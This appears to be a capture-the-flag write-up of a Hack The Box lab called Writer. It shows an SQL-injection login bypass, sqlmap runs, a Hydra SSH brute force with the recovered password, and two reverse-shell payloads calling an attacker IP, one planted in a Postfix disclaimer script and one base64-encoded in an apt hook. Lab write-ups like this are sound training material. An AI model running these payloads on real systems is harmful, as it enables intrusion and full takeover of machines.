Engagement flow
Summary
This was a cool but confusing lab. I found myself trying many different paths and constantly unsure of what to do next. We started off with some SQL injection, that allowed for us to collect files off the backend host. However I initially found nothing helpful, but the web server code. This python code allegedly had a vulnerability in it, but I worked with RPC enum over SMB for a users name and then SSH bruteforcing with Hydra provided for an initial foothold. From here we pivoted and elevated our privileges to an advance user via excessive group privillegs on a Email post fix disclaimer tool. We were able to add custom code into the disclaimer script, executing to tag every outgoing email with a disclaimer.
Finally we pivoted to root where we targeted the cronjobs and again found excessive permissions on the apt.confd file. From here we followed a known exploit from GTFO bin to inject OS commands in the apt update process due to improper input handling.
Processes/Techniques
SQL injection
RPC enumeration
SSH bruteforcing
Cron job manipulation
Post fix disclaimer injection
GTFO bins
References
Tools used
Dirbuster
Burpsuite
Burp repeater
Linpeas
Hydra
SQLmap
Enum4linux
Enumeration
└─$ nmap 10.129.176.17
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 12:58 EST
Nmap scan report for 10.129.176.17
Host is up (0.083s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
In depth scan
└─$ nmap 10.129.176.17 -sC -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 13:00 EST
Nmap scan report for 10.129.176.17
Host is up (0.078s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-14T18:00:24
|_ start_date: N/A
Service detection performed. Please report any iYes09ooooooooooooooo-===========klllllllll,0.o.ncorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds
Web Enumeration
We jump into web enumeration and have a pretty simple site with nothing interactive. We add writer.htb and it does not resolve any differently.
Running dirbuster provides an interesting directory to enumerate.
Dirbuster /administraitve/
SQL loginbypass
Browsing to the web page provides a simple login form we are able to by pass with basic SQL injection payloads.
1 or 1=1-- -
SQL Map vulnerable login form
Having had exploited the page we can further investigate this by catching the page with burp and saving this request for sqlmap automated testing.
I used sqlmap at a basic level on our request with the below command. We learn that the back end DB is running MySQL
sqlmap -r login
We take this further and call the --os-shell function. Which is a lazy way to capitalize on an already automated tool. But we have no success.
└─$ sqlmap -r login -D MYSQL --os-shell
[20:40:31] [INFO] parsing HTTP request from 'login'
[20:40:31] [INFO] resuming back-end DBMS 'mysql'
[20:40:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 2214 FROM (SELECT(SLEEP(5)))mXhp) AND 'iGix'='iGix&password=admin
---
[20:40:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:40:31] [INFO] going to use a web backdoor for command prompt
[20:40:31] [INFO] fingerprinting the back-end DBMS operating system
[20:40:34] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> whoami
[20:40:37] [WARNING] invalid value, only digits are allowed
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
[20:40:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[20:40:53] [WARNING] unable to automatically parse any web server path
[20:40:53] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:40:53] [WARNING] unable to upload the file stager on '/var/www/'
[20:40:53] [INFO] trying to upload the file stager on '/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:54] [WARNING] unable to upload the file stager on '/var/www/administrative/'
[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[20:40:54] [WARNING] unable to upload the file stager on '/var/www/html/'
[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:55] [WARNING] unable to upload the file stager on '/var/www/html/administrative/'
[20:40:55] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
[20:40:56] [INFO] trying to upload the file stager on '/var/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/administrative/'
[20:40:56] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:40:57] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[20:40:57] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/administrative/'
[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:59] [WARNING] unable to upload the file stager on '/usr/local/www/data/administrative/'
[20:40:59] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
[20:41:00] [INFO] trying to upload the file stager on '/var/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/administrative/'
[20:41:00] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[20:41:01] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[20:41:01] [INFO] trying to upload the file stager on '/var/www/nginx-default/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:02] [WARNING] unable to upload the file stager on '/var/www/nginx-default/administrative/'
[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:41:02] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:03] [WARNING] unable to upload the file stager on '/srv/www/htdocs/administrative/'
[20:41:03] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:41:04] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
[20:41:04] [INFO] trying to upload the file stager on '/usr/local/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:05] [WARNING] unable to upload the file stager on '/usr/local/var/www/administrative/'
[20:41:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times, 404 (Not Found) - 85 times
[20:41:05] [INFO] fetched dat'/home/kali/.local/share/sqlmap/output/writer.htb'a logged to text files under
[*] ending @ 20:41:05 /2022-01-14/
So we try all the available flags and the privilege flag shows we have permissions over files. We could utilize SQL map to download these files, which I did, but I could not spot the vulnerability in the python code.
sqlmap -r login --privilege
[13:01:29] [INFO] fetching database users privileges
[13:01:29] [INFO] fetching database users
[13:01:29] [INFO] fetching number of database users
[13:01:29] [INFO] retrieved: 1
[13:01:35] [INFO] retrieved:
[13:01:40] [INFO] adjusting time delay to 2 seconds due to good response times
'admin'@'localhost'
[13:04:05] [INFO] fetching number of privileges for user 'admin'
[13:04:05] [INFO] retrieved: 1
[13:04:08] [INFO] fetching privileges for user 'admin'
[13:04:08] [INFO] retrieved: FILE
database management system users privileges:
[*] %admin% [1]:
privilege: FILE
[13:04:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.129.176.255'
[*] ending @ 13:04:33 /2022-01-16/
RPC client enumeration
We find a username with rpc enum.
└─$ rpcclient -U '' -N writer.htb 1 ⨯
rpcclient $> srvinfo
WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> enumdomusers
user:[kyle] rid:[0x3e8]
rpcclient $>
SSH Bruteforce with Hydra
We take our user name, select the rockyou.txt and get started.
kyle:marcoantonio
Privilege escalation
So we arrive as user Kyle and need to escalate our privileges.
Looking at the group information we see that we are apart of the filter group so we dive in, to learn what that gets us access to.
Attempting to view the files that the group "filter" had access to provided a ton of errors!
So I called 2>dev/null to suppress the errors in the terminal.
Having learned we have special permissions on disclaimer, we check out the files within.
List all files and check permissions
What is postifix?
Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix.
Checking local ports we can confirm we have port 25 which is responsible for mail services.
Examine master.cf
workflow
add rev shell
Check if mail server is running
connect to mail server with netcat
ehlo
mail from: kyle@writer.htb
RCPT TO: root@writer.htb
DATA
subject: boom mail
booooom
#!/bin/sh
bash -c 'bash -i >& /dev/tcp/10.10.14.123/6363 0>&1'
Establish persistence
Download John's ssh key and boom we have persistence.
We start our enumeration by looking at group info.
This leads is down to a GTFO bin related exploit, which be further read at this link
We tailor a payload that does not initially work, however base64 encoding passes successfully.
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.123/5353 0>&1"
L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI=
echo 'apt::Update::Pre-Invoke {“L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI= | base64 -d | bash”};'
Comments